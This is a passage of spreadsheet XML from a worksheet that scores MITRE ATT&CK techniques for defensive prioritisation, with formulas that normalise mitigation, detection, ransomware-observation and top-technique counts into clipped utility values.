        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z561">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA561">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB561">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC561" s="29"/>
      <c r="AD561" s="25" t="str" cm="1">
        <f t="array" ref="AD561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE561" s="25">
        <f>IF(AD561="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF561" s="25" t="str" cm="1">
        <f t="array" ref="AF561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG561" s="25">
        <f>IF(AF561="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH561" s="25" t="str" cm="1">
        <f t="array" ref="AH561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI561" s="25">
        <f>IF(AH561="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ561" s="25" t="str" cm="1">
        <f t="array" ref="AJ561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK561" s="25">
        <f>IF(AJ561="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL561" s="25" t="str" cm="1">
        <f t="array" ref="AL561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM561" s="25">
        <f>IF(AL561="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN561" s="52">
        <v>0</v>
      </c>
      <c r="AO561" s="51">
        <v>0</v>
      </c>
      <c r="AP561" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ561" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR561" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS561" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT561" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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62" spans="1:47" ht="48">
      <c r="A562" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B562" s="25">
        <f>SUM(H562,M562,V562)*(1+SUM(AE562,AG562,AI562,AK562,AM562))</f>
        <v>0.05</v>
      </c>
      <c r="C562" s="25" t="s">
        <v>1935</v>
      </c>
      <c r="D562" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E562" s="25" t="s">
        <v>1888</v>
      </c>
      <c r="F562" s="51">
        <v>0</v>
      </c>
      <c r="G562" s="51">
        <v>1</v>
      </c>
      <c r="H562" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I562">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J562">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K562">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L562">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M562" s="25">
        <v>0</v>
      </c>
      <c r="N562" s="51">
        <v>0</v>
      </c>
      <c r="O562" s="51">
        <v>0</v>
      </c>
      <c r="P562" s="51">
        <v>0</v>
      </c>
      <c r="Q562" s="51">
        <v>0</v>
      </c>
      <c r="R562" s="51"/>
      <c r="S562" s="51">
        <v>0</v>
      </c>
      <c r="T562" s="51"/>
      <c r="U562" s="51">
        <v>0</v>
      </c>
      <c r="V562" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W562">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X562">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y562">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z562">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA562">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB562">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC562" s="29" t="s">
        <v>1936</v>
      </c>
      <c r="AD562" s="25" t="str" cm="1">
        <f t="array" ref="AD562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE562" s="25">
        <f>IF(AD562="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF562" s="25" t="str" cm="1">
        <f t="array" ref="AF562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG562" s="25">
        <f>IF(AF562="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH562" s="25" t="str" cm="1">
        <f t="array" ref="AH562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI562" s="25">
        <f>IF(AH562="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ562" s="25" t="str" cm="1">
        <f t="array" ref="AJ562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK562" s="25">
        <f>IF(AJ562="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL562" s="25" t="str" cm="1">
        <f t="array" ref="AL562">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC562)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM562" s="25">
        <f>IF(AL562="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN562" s="60">
        <v>0</v>
      </c>
      <c r="AO562" s="51">
        <v>0</v>
      </c>
      <c r="AP562" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ562" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR562" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS562" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT562" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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63" spans="1:47">
      <c r="A563" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B563" s="25">
        <f>SUM(H563,M563,V563)*(1+SUM(AE563,AG563,AI563,AK563,AM563))</f>
        <v>0.05</v>
      </c>
      <c r="C563" s="25" t="s">
        <v>1937</v>
      </c>
      <c r="D563" s="25" t="s">
        <v>1704</v>
      </c>
      <c r="E563" s="25" t="s">
        <v>1938</v>
      </c>
      <c r="F563" s="51">
        <v>0</v>
      </c>
      <c r="G563" s="51">
        <v>1</v>
      </c>
      <c r="H563" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I563">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J563">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K563">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L563">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M563" s="25">
        <v>0</v>
      </c>
      <c r="N563" s="51">
        <v>0</v>
      </c>
      <c r="O563" s="51">
        <v>0</v>
      </c>
      <c r="P563" s="51">
        <v>0</v>
      </c>
      <c r="Q563" s="51">
        <v>0</v>
      </c>
      <c r="R563" s="51"/>
      <c r="S563" s="51">
        <v>0</v>
      </c>
      <c r="T563" s="51"/>
      <c r="U563" s="51">
        <v>0</v>
      </c>
      <c r="V563" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W563">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X563">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y563">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z563">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA563">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB563">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC563" s="29" t="s">
        <v>1932</v>
      </c>
      <c r="AD563" s="25" t="str" cm="1">
        <f t="array" ref="AD563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE563" s="25">
        <f>IF(AD563="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF563" s="25" t="str" cm="1">
        <f t="array" ref="AF563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG563" s="25">
        <f>IF(AF563="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH563" s="25" t="str" cm="1">
        <f t="array" ref="AH563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI563" s="25">
        <f>IF(AH563="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ563" s="25" t="str" cm="1">
        <f t="array" ref="AJ563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK563" s="25">
        <f>IF(AJ563="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL563" s="25" t="str" cm="1">
        <f t="array" ref="AL563">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC563)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM563" s="25">
        <f>IF(AL563="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN563" s="60">
        <v>0</v>
      </c>
      <c r="AO563" s="51">
        <v>0</v>
      </c>
      <c r="AP563" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ563" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR563" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS563" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT563" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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64" spans="1:47">
      <c r="A564" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B564" s="25">
        <f>SUM(H564,M564,V564)*(1+SUM(AE564,AG564,AI564,AK564,AM564))</f>
        <v>0.05</v>
      </c>
      <c r="C564" s="25" t="s">
        <v>1939</v>
      </c>
      <c r="D564" s="25" t="s">
        <v>1704</v>
      </c>
      <c r="E564" s="25" t="s">
        <v>1940</v>
      </c>
      <c r="F564" s="51">
        <v>0</v>
      </c>
      <c r="G564" s="51">
        <v>1</v>
      </c>
      <c r="H564" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I564">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J564">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K564">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L564">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M564" s="25">
        <v>0</v>
      </c>
      <c r="N564" s="51">
        <v>0</v>
      </c>
      <c r="O564" s="51">
        <v>0</v>
      </c>
      <c r="P564" s="51">
        <v>0</v>
      </c>
      <c r="Q564" s="51">
        <v>0</v>
      </c>
      <c r="R564" s="51"/>
      <c r="S564" s="51">
        <v>0</v>
      </c>
      <c r="T564" s="51"/>
      <c r="U564" s="51">
        <v>0</v>
      </c>
      <c r="V564" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W564">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X564">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y564">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z564">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA564">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB564">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC564" s="29" t="s">
        <v>1932</v>
      </c>
      <c r="AD564" s="25" t="str" cm="1">
        <f t="array" ref="AD564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE564" s="25">
        <f>IF(AD564="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF564" s="25" t="str" cm="1">
        <f t="array" ref="AF564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG564" s="25">
        <f>IF(AF564="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH564" s="25" t="str" cm="1">
        <f t="array" ref="AH564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI564" s="25">
        <f>IF(AH564="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ564" s="25" t="str" cm="1">
        <f t="array" ref="AJ564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK564" s="25">
        <f>IF(AJ564="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL564" s="25" t="str" cm="1">
        <f t="array" ref="AL564">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC564)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM564" s="25">
        <f>IF(AL564="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN564" s="52">
        <v>0</v>
      </c>
      <c r="AO564" s="51">
        <v>0</v>
      </c>
      <c r="AP564" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ564" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR564" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS564" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT564" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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65" spans="1:47" ht="32.1">
      <c r="A565" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B565" s="25">
        <f>SUM(H565,M565,V565)*(1+SUM(AE565,AG565,AI565,AK565,AM565))</f>
        <v>0.05</v>
      </c>
      <c r="C565" s="25" t="s">
        <v>1941</v>
      </c>
      <c r="D565" s="25" t="s">
        <v>1942</v>
      </c>
      <c r="E565" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F565" s="51">
        <v>0</v>
      </c>
      <c r="G565" s="51">
        <v>1</v>
      </c>
      <c r="H565" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I565">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J565">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K565">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L565">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M565" s="25">
        <v>0</v>
      </c>
      <c r="N565" s="51">
        <v>0</v>
      </c>
      <c r="O565" s="51">
        <v>0</v>
      </c>
      <c r="P565" s="51">
        <v>0</v>
      </c>
      <c r="Q565" s="51">
        <v>0</v>
      </c>
      <c r="R565" s="51"/>
      <c r="S565" s="51">
        <v>0</v>
      </c>
      <c r="T565" s="51"/>
      <c r="U565" s="51">
        <v>0</v>
      </c>
      <c r="V565" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W565">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X565">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y565">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z565">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA565">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB565">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC565" s="29" t="s">
        <v>1943</v>
      </c>
      <c r="AD565" s="25" t="str" cm="1">
        <f t="array" ref="AD565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE565" s="25">
        <f>IF(AD565="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF565" s="25" t="str" cm="1">
        <f t="array" ref="AF565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG565" s="25">
        <f>IF(AF565="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH565" s="25" t="str" cm="1">
        <f t="array" ref="AH565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI565" s="25">
        <f>IF(AH565="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ565" s="25" t="str" cm="1">
        <f t="array" ref="AJ565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK565" s="25">
        <f>IF(AJ565="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL565" s="25" t="str" cm="1">
        <f t="array" ref="AL565">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC565)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM565" s="25">
        <f>IF(AL565="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
